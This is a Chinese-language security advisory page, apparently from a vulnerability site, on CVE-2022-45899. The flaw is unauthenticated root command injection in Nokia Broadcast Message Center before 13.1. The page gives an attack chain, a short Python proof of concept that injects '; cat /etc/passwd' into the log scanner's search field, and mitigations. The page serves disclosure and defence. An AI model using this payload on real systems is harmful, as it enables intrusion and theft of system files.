IPBUF安全漏洞报告
English
CVE-2022-45899 CVSS 6.5 中危

CVE-2022-45899 Nokia BMC远程命令执行漏洞

披露日期: 2026-05-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2022-45899
漏洞类型
远程命令执行
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Nokia Broadcast Message Center (BMC)

相关标签

RCEOS Command InjectionNokiaBMCRoot Privilege

漏洞概述

Nokia Broadcast Message Center (BMC) 13.1之前版本存在操作系统命令注入漏洞。由于应用未正确过滤用户输入,未经身份验证的远程攻击者可通过“Log Scanner Search Pattern”字段提交包含shell元字符的恶意数据。由于服务以root权限运行,攻击者成功利用该漏洞可在目标系统上执行任意系统命令,从而完全控制受影响的服务器,造成敏感信息泄露及数据篡改。

技术细节

该漏洞的根源在于Nokia BMC的日志扫描器功能未对“Search Pattern”输入参数进行严格的过滤和验证。攻击者无需登录即可访问该接口。当用户提交搜索请求时,后端程序直接将输入内容拼接到系统Shell命令中执行。攻击者可以通过插入分号(;)、管道符(|)或反引号(`)等Shell元字符,截断原始命令并拼接恶意指令。由于相关服务进程是以root用户身份运行的,注入的命令将以最高权限执行,这使得攻击者能够读取敏感文件、安装后门或破坏系统核心组件。该漏洞利用简单,危害性高,属于典型的无认证RCE漏洞。

攻击链分析

STEP 1
步骤1:侦察
攻击者扫描网络,识别出暴露的Nokia BMC服务,并确认其版本低于13.1。
STEP 2
步骤2:构造载荷
攻击者构造包含Shell元字符(如; | `)的恶意字符串,旨在劫持系统命令执行流程。
STEP 3
步骤3:发送漏洞利用请求
攻击者向Log Scanner Search Pattern接口发送特制的HTTP请求,无需进行身份认证。
STEP 4
步骤4:执行恶意命令
服务器后端未过滤输入,直接将载荷拼接至Shell命令中,以Root权限执行攻击者指定的系统指令。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example, replace with actual vulnerable endpoint) target_url = "http://target-bmc-ip/log_scanner" # Malicious payload to inject OS command # Payload attempts to read /etc/passwd using a semicolon to break the command payload = "; cat /etc/passwd" data = { "search_pattern": payload, "action": "search" } try: response = requests.post(target_url, data=data, timeout=5) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Nokia Broadcast Message Center (BMC) < 13.1

防御指南

临时缓解措施
如果无法立即升级,建议通过网络ACL或防火墙严格限制对BMC系统管理端口的访问,仅允许可信的管理IP地址连接。同时,应密切监控系统日志,检测是否存在异常的搜索模式提交或非预期的Shell进程启动。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。